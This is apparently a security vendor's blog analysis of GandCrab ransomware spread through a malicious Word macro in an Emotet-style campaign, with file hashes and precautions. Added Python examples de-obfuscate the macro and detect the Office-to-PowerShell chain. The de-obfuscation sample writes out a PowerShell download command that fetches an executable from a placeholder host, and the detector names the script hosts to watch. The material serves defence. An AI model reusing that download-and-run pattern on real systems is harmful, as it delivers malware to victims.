15 February 2019

GandCrab Riding Emotet’s Bus!

Written by Bajrang Mane
Ransomware, Security

Emotet is known for constantly changing its payload and infection vectors, such as spam mail, malicious documents and even malicious JS files, and it has compromised a very high number of websites on the internet. The Emotet malware campaign has existed since 2014 and returns at intervals with different techniques and variants to deliver malware on a victim’s machine. Most of the websites involved are genuine but have somehow been tricked into delivering Emotet. This time, some of these websites were seen delivering GandCrab Ransomware V5.1 for some time.

The payload was downloaded to the victim’s computer through a malicious document using a VBA macro. The PowerShell script launched by the macro connected to the compromised website and downloaded GandCrab ransomware from the URL. The same website was observed in other malicious campaigns, serving different purposes over time.

Infection Vector:

Fig. 1 Attack Chain

Technical Analysis:

The Microsoft Office document was named ‘Urgent notice.doc’ and contained only the text ‘Urgent notice’.

Fig. 2 Document File

After opening the file, it asks the user to enable macros in order to perform the download.

Macro:

The malicious macro contained three modules and one form. The form named ‘f’ contains the obfuscated PowerShell data, and the three modules, with random names like cBbOFw, BJXTRQZOY and lC0gFL58m, contain the code that de-obfuscates and executes the PowerShell script.

Fig. 3 Modules and Form

Form:

Fig. 4 Obfuscated Macro

This can be de-obfuscated simply by replacing ‘5820.5840869546’ with an empty string (i.e. removing every occurrence of ‘5820.5840869546’ from the string).

Output:

Fig. 5 De-obfuscated Macro

This output is prefixed with the three characters ‘P’, ’o’ and ‘w’, which are held in variables at the start of the script. This forms the initial word PowerShell; the resulting command is then passed to the function love() and executed to download and launch the payload.
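The two de-obfuscation steps described above (strip the repeated junk token, restore the ‘Pow’ prefix) are mechanical enough to script. The following Python is an added example, not code from the original post or from Quick Heal Security Labs; the form text it works on is a constructed sample in the shape the analysis describes, with a placeholder URL, since the real form contents are only shown in the screenshot. It goes slightly beyond the post by locating the junk token automatically, on the assumption that in this obfuscation family the junk is the decimal-looking string that repeats far more often than anything else.

```python
import re
from collections import Counter

# Junk token the macro sprinkles through the form text (taken from the analysis above).
JUNK_TOKEN = "5820.5840869546"
# The three characters the macro prepends from separate variables to form "PowerShell".
PREFIX = "Pow"

# Constructed sample modelled on form 'f'. The host, URL and command body are
# placeholders for illustration, not the campaign's real values.
_J = JUNK_TOKEN
SAMPLE_FORM_TEXT = (
    "er" + _J + "Shell -nop -w hid" + _J + "den -c Invoke-WebRequest "
    "'http://compro" + _J + "mised.example/putty.exe' "
    "-OutFile 'C:\\Windows\\Temp\\putty.exe'"
)


def find_junk_token(text, min_count=2):
    """Heuristic for this obfuscation family: the junk is a decimal-looking token
    that repeats. Returns the most frequent candidate occurring at least
    `min_count` times, or None if the text does not fit the pattern."""
    candidates = Counter(re.findall(r"\d+\.\d+", text))
    if not candidates:
        return None
    token, count = candidates.most_common(1)[0]
    return token if count >= min_count else None


def deobfuscate(form_text, junk=None, prefix=PREFIX):
    """Strip every occurrence of the junk token and restore the 'Pow' prefix,
    reproducing what the macro's modules do before the command reaches love()."""
    junk = junk or find_junk_token(form_text)
    if junk is None:
        raise ValueError("no repeated junk token found; not this obfuscation pattern")
    return prefix + form_text.replace(junk, "")


def extract_urls(command):
    """Pull download URLs out of the recovered command so they can be blocked or hunted."""
    return re.findall(r"https?://[^\s'\"<>]+", command)


if __name__ == "__main__":
    recovered = deobfuscate(SAMPLE_FORM_TEXT)
    print(recovered)
    print("URLs to block:", extract_urls(recovered))
```

Running it prints the recovered command starting with `PowerShell` and lists the download URL, which is the piece of the macro an analyst most wants for blocking and for pivoting on the compromised host.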

Fig. 6 PowerShell Execution

After execution of this PowerShell script, putty.exe, which is the GandCrab payload, was downloaded to the ‘C:\Windows\Temp’ directory of the victim’s machine and executed.
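The chain just described (Word launches PowerShell, PowerShell drops and runs an executable from C:\Windows\Temp) is a good candidate for endpoint detection. The Python below is an added example written for this post, not code from the original or from the vendor; it runs simple rules plus a parent-child correlation over a constructed batch of Sysmon-style process-creation events. The event field names (`pid`, `ppid`, `parent`, `image`, `cmdline`) and the benign events are assumptions for illustration, and the batch is assumed to be in chronological order.

```python
import ntpath

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
WINDOWS_TEMP = "c:\\windows\\temp\\"

# Constructed process-creation events modelling the chain in the post
# (WINWORD -> powershell -> putty.exe in C:\Windows\Temp) plus two benign events.
# Not real telemetry; the downloader body is deliberately omitted.
SAMPLE_EVENTS = [
    {"id": 1, "pid": 2000, "ppid": 1000,
     "parent": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "PowerShell -nop -w hidden -c <downloader omitted>"},
    {"id": 2, "pid": 3000, "ppid": 2000,
     "parent": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "image": "C:\\Windows\\Temp\\putty.exe",
     "cmdline": "C:\\Windows\\Temp\\putty.exe"},
    {"id": 3, "pid": 4000, "ppid": 900,
     "parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "cmd.exe"},
    {"id": 4, "pid": 2500, "ppid": 4000,
     "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell Get-Date"},
]


def _name(path):
    """Lower-cased file name of a Windows path; ntpath handles backslashes on any OS."""
    return ntpath.basename(path).lower()


def detect(events):
    """Return (event id, rule name) findings. Two per-event rules catch each stage;
    the third correlates them by tracking PIDs of script hosts spawned by Office."""
    findings = []
    office_spawned_pids = set()
    for ev in events:
        parent, image = _name(ev["parent"]), _name(ev["image"])
        if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
            findings.append((ev["id"], "office_spawned_script_host"))
            office_spawned_pids.add(ev["pid"])
        if ev["image"].lower().startswith(WINDOWS_TEMP):
            findings.append((ev["id"], "executable_launched_from_windows_temp"))
            # Same binary launched by a PowerShell that Word started: the full chain.
            if ev["ppid"] in office_spawned_pids:
                findings.append((ev["id"], "office_to_script_to_temp_chain"))
    return findings


if __name__ == "__main__":
    for event_id, rule in detect(SAMPLE_EVENTS):
        print(f"event {event_id}: {rule}")
```

Event 4 (PowerShell started from a console) produces nothing, which is the point of keying the first rule on the Office parent rather than on PowerShell itself; the chain rule fires only when the Temp-directory executable's parent PID was recorded earlier as Office-spawned.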

GandCrab Payload:

On execution, it encrypted all files and displayed the GandCrab wallpaper. From the ransom note, it is clear that the payload was GandCrab V5.1 ransomware.

Fig. 7 Ransom Note

GandCrab looks for AV processes on the victim’s computer, and it also tries to kill other running processes, such as SQL database servers, so that important files that would otherwise be locked can be encrypted. GandCrab then encrypts all files with the Salsa20 algorithm; the Salsa20 key is encrypted with RSA-2048 and appended to the file after the data. It is not feasible to decrypt the data without the private key. It also collects data related to the user, such as the username, computer name, workgroup and IP address. This data is encrypted with the RC4 algorithm and sent to the C&C server.

The GandCrab v5 ransomware has started using the Task Scheduler ALPC vulnerability to gain SYSTEM privileges on an infected computer.

After encryption, it demands $700 in DASH or Bitcoin; a further 10% is charged for miner fees/commission. In the past, victims who could not pay the full ransom amount were offered a discount to decrypt their files.

Fig. 8 GandCrab Ransom Page

Finally, GandCrab tries to connect to a number of compromised domains that share a particular URL formation algorithm, as discussed previously. This behaviour shows a similarity with the Emotet campaign.

After a few hours, the same domain started serving pornographic phishing content.

Indicator of Compromise:

Doc File (Urgent notice.doc): 64F3F3CC1E121B295DA1FF74CC180473

Exe File (Putty.exe): 5B1B6AF59E29D9A2AA120277CAB14D0C

Precautions:

  • Do not open emails from unknown sources.
  • Do not download attachments received from an untrusted source.
  • Validate sender’s email id before clicking URLs mentioned in the mail.
  • Do not enable macros/editing mode by default.

We recommend that users apply the latest Microsoft update packages and keep their antivirus up to date with active email protection.

Subject Matter Experts

Jayesh Kulkarni, Amit Gadhave | Quick Heal Security Labs

About Bajrang Mane

Bajrang Mane is leading the Threat Analysis, Incident response, and Automation teams in Quick Heal Security Labs. Having spent 13 years in the IT security industry,...
